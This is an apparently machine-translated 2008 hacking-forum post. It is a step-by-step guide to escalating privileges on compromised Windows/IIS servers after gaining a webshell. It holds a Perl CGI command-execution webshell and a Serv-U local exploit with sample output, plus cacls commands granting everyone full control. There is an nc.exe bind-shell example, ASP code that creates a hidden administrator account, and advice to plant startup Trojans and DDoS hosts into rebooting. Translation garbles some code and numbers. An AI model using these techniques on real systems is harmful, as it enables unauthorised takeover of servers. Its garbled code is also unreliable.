Many master elevated skill-vulnerability warning-the black bar safety net

ID MYHACK58:62200819767
Type myhack58
Reporter 佚名
Modified 2008-07-22T00:00:00


The present article combines many of the master elevated tips

When we get a webshell when next you want to do is elevate privileges

Personal summary as follows: 1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere see if you can jump to this directory, if the line that is the best, and directly under it the CIF file, get the pcAnywhere password, login

  1. C:\WINNT\system32\config into here it's the SAM, crack the user's password c:\winnt\repaire the following is the backup With to crack sam password the software with LC, SAMinside

  2. C:\Documents and Settings\All Users\Start Menu\Programs seen here can jump No, we're from here, you can get a lot of useful information You can see a lot of shortcuts, we generally choose Serv-U, then the local view the properties, know the path, see if you can jump Once inside, if the permission to modify the ServUDaemon. ini, add a user up, the password is empty [USER=dede|1] Password= HomeDir=c:TimeOut=6 0 0 Maintenance=System Access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYValues= This user has the highest permissions, and then we can ftp up the quote site exec xxx to elevate permissions

  3. c:\winnt\system32\inetsrv\data is the directory, the same is erveryone full control, we have to do is put an elevated tool upload go up, and then perform the

  4. See if you can jump to the following directory c:\php with phpspy c:\prel sometimes is not necessarily the directory(the same can by download a shortcut to see the properties of the know)with cgi webshell

!/ usr/bin/perl

binmode(STDOUT); syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 2 7); $ = $ENV{QUERY_STRING}; s/%2 0/ /ig; s/%2f/\//ig; $execthis = $; syswrite(STDOUT, "<HTML><PRE>\r\n", 1 3); open(STDERR, ">&STDOUT") || die "Can't redirect STDERR"; system($execthis); syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 1 7); close(STDERR); close(STDOUT); exit; Save for the cgi execution, If not, you can try the pl extension to it, put just the cgi files to pl files, submit http://anyhost// Display"access denied", that can perform! Immediately submit: 先的上传个su.exe(ser-u elevation of the tool)to prel bin directory http://anyhost//\perl\bin\su.exe Returns: Serv-u >3. x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l-p 9 9-e cmd.exe" Now is the IUSR permissions, submit: http://anyhost//\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F" http://anyhost//\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F" http://anyhost//\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F" http://anyhost//\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F" If returns the following information, it indicates success. Serv-u >3. x Local Exploit by xiaolu

<2 2 0 Serv-U FTP Server v5. 2 for WinSock ready...

>USER LocalAdministrator

<3 3 1 User name okay, need password.

>PASS #l@$ak#. lk;0@P

<2 3 0 User logged in, proceed.


[+] Creating New Domain...

<2 0 0-DomainID=2

<2 2 0 Domain settings saved

[+] Domain xl:2 Created

[+] Creating Evil User

<2 0 0-User=xl

2 0 0 User settings saved

[+] Now Exploiting...

>USER xl

<3 3 1 User name okay, need password.

>PASS 1 1 1 1 1 1

<2 3 0 User logged in, proceed.

[+] Now Executing: cacls.exe c: /E /T /G everyone:F

<2 2 0 Domain deleted Thus all partition as everyone full control Now we put their user promoted to administrator:

http://anyhost//\perl\bin\su.exe "net localgroup administrators IUSR_anyhost /add"

  1. You can successfully run"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"to elevate permissions With this cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps View have the privilege of the dll file: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll Then the asp. dll join the privileged family of asp.dll 是 放 在 c:\winnt\system32\inetsrv\asp.dll (the different subsystems put in the position not necessarily the same) We now added cscript adsutil. vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll" You can use cscript adsutil. vbs get /W3SVC/InProcessIsapiApps to view is not added to the list.

  2. You can also use this code to try to enhance, as if the effect is not obvious <<%Response. Expires=0">%@codepage=9 3 6%><%Response. Expires=0 on error resume next Session. TimeOut=5 0 Server.ScriptTimeout=3 0 0 0 set lp=Server. CreateObject("WSCRIPT. NETWORK") oz="WinNT://"&lp. ComputerName Set ob=GetObject(oz) Set oe=GetObject(oz&"/Administrators,group") Set od=ob. Create("user","WekweN$") od. SetPassword "WekweN" <----- password od. SetInfo The Set of=GetObject(oz&"/WekweN$,user") oe. Add(of. ADsPath) Response. write "WekweN$ Super account established successfully!"%& gt;

Use this code to check whether the upgrade is successful <%@codepage=9 3 6%> <%Response. Expires=0 on error resume next 'to find Administrators group account Set tN=server. CreateObject("Wscript. Network") Set objGroup=GetObject("WinNT://"&tN. ComputerName&"/Administrators,group") For Each admin in objGroup. Members Response. write admin. Name&"<br>" Next if err then Response. write "I can't.: Wscript. Network" end if %>

  1. C:\Program Files\Java Web Start here if you can, generally very small, you can try to use a jsp webshell, I heard that permission is very small, I had not met before.

  2. Finally, if the host setting is the metamorphosis, you can try the following in c:\Documents and Settings\All Users\Start Menu\Programs\Startup"write bat, vbs, etc. Trojan.

Wait for the host to restart or yourddosto force it to restart, to reach elevated objects.

Summed up, that is, to find the execution and writing of the directory, whatever directory, and then upload the lifting Tool, the final implementation, the three words"find" "on""execution."

The above is my humble opinion, we have what good method a lot to share